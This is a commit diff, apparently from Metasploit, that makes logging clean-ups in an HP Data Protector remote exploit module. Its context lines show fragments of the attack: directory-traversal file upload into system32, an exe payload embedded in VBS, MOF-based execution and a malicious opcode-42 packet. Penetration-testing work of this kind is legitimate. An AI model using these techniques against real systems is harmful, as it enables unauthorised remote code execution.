Add minor clean up

bug/bundler_fix
jvazquez-r7 2014-01-16 17:55:45 -06:00
parent f3c912bd32
commit eaf1b0caf6
1 changed files with 3 additions and 2 deletions

View File

@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
return Exploit::CheckCode::Unknown
end
print_status("HP Data Protector version #{fingerprint}")
print_status("#{peer} - HP Data Protector version #{fingerprint}")
if fingerprint =~ /HP Data Protector A\.06\.(\d+)/
minor = $1.to_i
@ -92,6 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote
mof_name = rand_text_alpha(rand(10)+5) + '.mof'
mof = generate_mof(mof_name, vbs_name)
# We can't upload binary contents, so embedding the exe into a VBS.
print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{vbs_name}")
res = upload_file("windows\\system32\\#{vbs_name}", vbs)
@ -158,7 +159,7 @@ class Metasploit3 < Msf::Exploit::Remote
"\\..\\..\\..\\..\\..\\#{file_name}", # rissServerCertificate
contents # Certificate contents
])
print_status("Sending malicious packet with opcode 42...")
vprint_status("#{peer} - Sending malicious packet with opcode 42...")
sock.put(pkt)
res = sock.get_once
disconnect